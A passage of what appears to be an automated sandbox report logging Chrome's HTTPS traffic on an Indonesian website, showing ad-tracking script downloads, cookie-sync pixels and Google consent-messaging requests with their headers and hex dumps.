                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:40 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                                                                                                                          ETag: "9b991fc4e41448221be02744748ec589"
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 c2b4a332b09677da722930ae336c8bfc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA56-C1
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: _d77x_Xxd7inOXC8y1E3rufmR9BKKDjIgRwnqZna7kdl-gAEmlgerw==
                                                                                                                                                                                                                                                                                                                                                                          Age: 1
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC16384INData Raw: 76 61 72 20 6c 6f 74 61 6d 65 49 73 43 6f 6d 70 61 74 69 62 6c 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 72 65 74 75 72 6e 20 28 20 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 6b 65 79 73 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 70 6f 73 74 4d 65 73 73 61 67 65 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 79 70 65 6f 66 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 79 70 65 6f 66 28 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 2e 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 29 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 20 21 3d 3d 20 27
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: var lotameIsCompatible = function() { return ( typeof Object.keys !== 'undefined' && typeof window.postMessage !== 'undefined' && typeof XMLHttpRequest !== 'undefined' && typeof(new XMLHttpRequest().withCredentials) !== 'undefined' && typeof console !== '
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC16384INData Raw: 28 62 3d 21 31 2c 73 79 6e 63 31 36 33 31 31 5f 2e 65 72 72 6f 72 28 22 74 61 67 49 6e 70 75 74 2e 64 61 74 61 2e 74 68 69 72 64 50 61 72 74 79 20 73 68 6f 75 6c 64 20 62 65 20 61 6e 20 6f 62 6a 65 63 74 22 29 29 3b 61 2e 6e 61 6d 65 73 70 61 63 65 7c 7c 28 62 3d 21 31 2c 73 79 6e 63 31 36 33 31 31 5f 2e 65 72 72 6f 72 28 22 74 61 67 49 6e 70 75 74 2e 64 61 74 61 2e 74 68 69 72 64 50 61 72 74 79 2e 6e 61 6d 65 73 70 61 63 65 20 69 73 20 6e 6f 74 20 64 65 66 69 6e 65 64 22 29 29 3b 61 2e 76 61 6c 75 65 7c 7c 28 62 3d 21 31 2c 73 79 6e 63 31 36 33 31 31 5f 2e 65 72 72 6f 72 28 22 74 61 67 49 6e 70 75 74 2e 64 61 74 61 2e 74 68 69 72 64 50 61 72 74 79 2e 76 61 6c 75 65 20 69 73 20 6e 6f 74 20 64 65 66 69 6e 65 64 22 29 29 3b 61 2e 6e 61 6d 65 73 70 61 63 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: (b=!1,sync16311_.error("tagInput.data.thirdParty should be an object"));a.namespace||(b=!1,sync16311_.error("tagInput.data.thirdParty.namespace is not defined"));a.value||(b=!1,sync16311_.error("tagInput.data.thirdParty.value is not defined"));a.namespace
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC10833INData Raw: 2b 63 29 7d 72 65 74 75 72 6e 21 31 7d 20 66 75 6e 63 74 69 6f 6e 20 73 79 6e 63 31 36 33 31 31 5f 4d 61 28 61 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 5f 5f 6c 6f 74 61 6d 65 49 66 72 61 6d 65 54 63 66 41 70 69 26 26 28 73 79 6e 63 31 36 33 31 31 5f 2e 64 65 62 75 67 28 22 49 6e 69 74 69 61 6c 69 7a 69 6e 67 20 54 43 46 20 73 75 70 70 6f 72 74 20 69 6e 20 61 6e 20 69 66 72 61 6d 65 22 29 2c 77 69 6e 64 6f 77 2e 5f 5f 6c 6f 74 61 6d 65 49 66 72 61 6d 65 54 63 66 41 70 69 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 2c 66 29 7b 76 61 72 20 68 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 22 22 3b 62 3d 7b 5f 5f 74 63 66 61 70 69 43 61 6c 6c 3a 7b 63 6f 6d 6d 61 6e 64 3a 62 2c 70 61 72 61 6d 65 74 65 72 3a 66
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: +c)}return!1} function sync16311_Ma(a){"undefined"===typeof window.__lotameIframeTcfApi&&(sync16311_.debug("Initializing TCF support in an iframe"),window.__lotameIframeTcfApi=function(b,c,d,f){var h=Math.random()+"";b={__tcfapiCall:{command:b,parameter:f


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          110192.168.2.74988035.244.174.684432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC514OUTGET /396846.gif?served_by=evergreen&partner_uid=790d1d18-a5ba-44b9-b204-a432fb8c1174 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: idsync.rlcdn.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: pxrc=CIbBs7gGEgUI6AcQABIFCOhHEAA=; rlas3=oidxsW5ixWRT4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC620INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          P3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: rlas3=7skOM0+eLylT4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=; Path=/; Domain=rlcdn.com; Expires=Tue, 14 Oct 2025 09:12:41 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: pxrc=CIbBs7gGEgUI6AcQABIFCOhHEAA=; Path=/; Domain=rlcdn.com; Expires=Fri, 13 Dec 2024 09:12:41 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          111192.168.2.749878142.250.185.1104432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC829OUTPOST /el/AGSKWxVAzDHl_-4j7DcCm6sYAbWFlq_mBsm_FyV6OOGNZcwDj1f1wVJJMJDPrG-A9X0dMOs9_cpdPTFlXO6fLqszIBQTCWLwCy0Y8TKsIXcvGA8rLOoYiWyUoC1SpBcoK0frF33KE48rcg== HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 155
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://ald.my.id
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC155OUTData Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 32 38 38 39 37 31 35 39 33 37 30 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 31 2c 31 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 5d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: [null,null,null,null,null,null,null,null,1728897159370,null,null,[[1,1]],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0]
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC1875INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ald.my.id
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-CxV4PmAyd2To5owHTUrVvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzj0tHikmLw0pBiWMy_i8kpfQZrCBC7a11k9Qfir3susf4F4r0fL7EeBWIhbo7Og5t3sAl8OPEvTsklKb8wPjk_ryQ1r0Q3MaVYF8QuykwqLckvQmGnloFU5OSnp2fmpccbGRiZGBoYGugZmMUXGAAAfMUw9w"
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          112192.168.2.749877142.250.185.1104432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC868OUTGET /f/AGSKWxX5zRX28eITzjJdCpLjeEeUzny5Gtt2HV7BffKc_f32tqAyqI-vwhlcT3j6MPwthxeOORbGEFlfHog780WZrbkKPCX_VEvso6NYDKW9wlcY2qsAZbhNI71RowP_G9I8NVVHim-fGLp3GD0qarIAmwEyoDTZ7JnQ7VvvpvSNA_P7mst2xnB2o5NQK7q9/_/ad-background./inlinetextads?_gads_footer./adgear2-/ads_top_ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC1893INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-Ra-6dXcS-0R6FWluh9l2lg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorGlobalRouterHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorGlobalRouterHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorGlobalRouterHttp/cspreport
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: default="/_/ContributorGlobalRouterHttp/web-reports?context=eJzjqtDikmJw0ZBiOO90h-k6EEt8fcmkAcRO6TNYg4C49eY51qlAnPTvPGsRELtrXWT1B2JDhUusjiBcdInVE4hVey6xmgLx_XWXWJ8D8dc9l1j_AvHej5dYjwJxkcQV1iYgvt10hfUxEAtxc3Qe3LyDTeDApFVpShpJ-YXxyfl5JUWZSaUl-UVpyWmpxalFZalF8UYGRiaGBgaWegZG8QUGAOkWSdw"
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC60INData Raw: 33 36 0d 0a 77 69 6e 64 6f 77 5b 27 35 62 62 38 63 35 62 31 2d 31 62 63 61 2d 34 61 38 31 2d 39 61 61 61 2d 63 38 66 63 61 62 61 36 32 32 61 32 27 5d 20 3d 20 74 72 75 65 3b 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 36window['5bb8c5b1-1bca-4a81-9aaa-c8fcaba622a2'] = true;
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          113192.168.2.74988734.117.77.794432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC737OUTGET /utsync.ashx?eid=50131&et=13&cid=lr&fp=ZHoAA2cM4IQAAAAICdw7Aw%3D%3D&gdpr=0&gdpr_consent=&return=https%3A%2F%2Fidsync.rlcdn.com%2F395886.gif%3Fpartner_uid%3D%5BPersonID%5D HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: ml314.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://t.sharethis.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC666INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                          content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          expires: 0,Tue, 15 Oct 2024 09:12:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          location: https://idsync.rlcdn.com/395886.gif?partner_uid=3647697138334302238
                                                                                                                                                                                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: pi=3647697138334302238; expires=Tue, 14 Oct 2025 09:12:41 GMT; domain=ml314.com; path=/; secure; samesite=none; httponly
                                                                                                                                                                                                                                                                                                                                                                          p3p: CP="NON DSP COR ADMo PSAo DEVo BUS COM UNI NAV DEM STA"
                                                                                                                                                                                                                                                                                                                                                                          x-cloud-trace-context: 6b498f845b5ab1d994ce6c0d356a966b
                                                                                                                                                                                                                                                                                                                                                                          date: Mon, 14 Oct 2024 09:12:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          server: Google Frontend
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 43
                                                                                                                                                                                                                                                                                                                                                                          via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          114192.168.2.74988535.244.174.684432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC742OUTGET /386076.gif?partner_uid=ZHoAA2cM4IQAAAAICdw7Aw%3D%3D&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: idsync.rlcdn.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://t.sharethis.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: pxrc=CIbBs7gGEgUI6AcQABIFCOhHEAA=; rlas3=oidxsW5ixWRT4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC252INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 21
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC21INData Raw: 69 6e 76 61 6c 69 64 20 63 6f 6e 73 65 6e 74 20 74 79 70 65 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: invalid consent type


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          115192.168.2.74988452.223.40.1984432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC730OUTGET /track/cmf/generic?ttd_pid=1h1y1a7&ttd_tpi=1&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: match.adsrvr.org
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
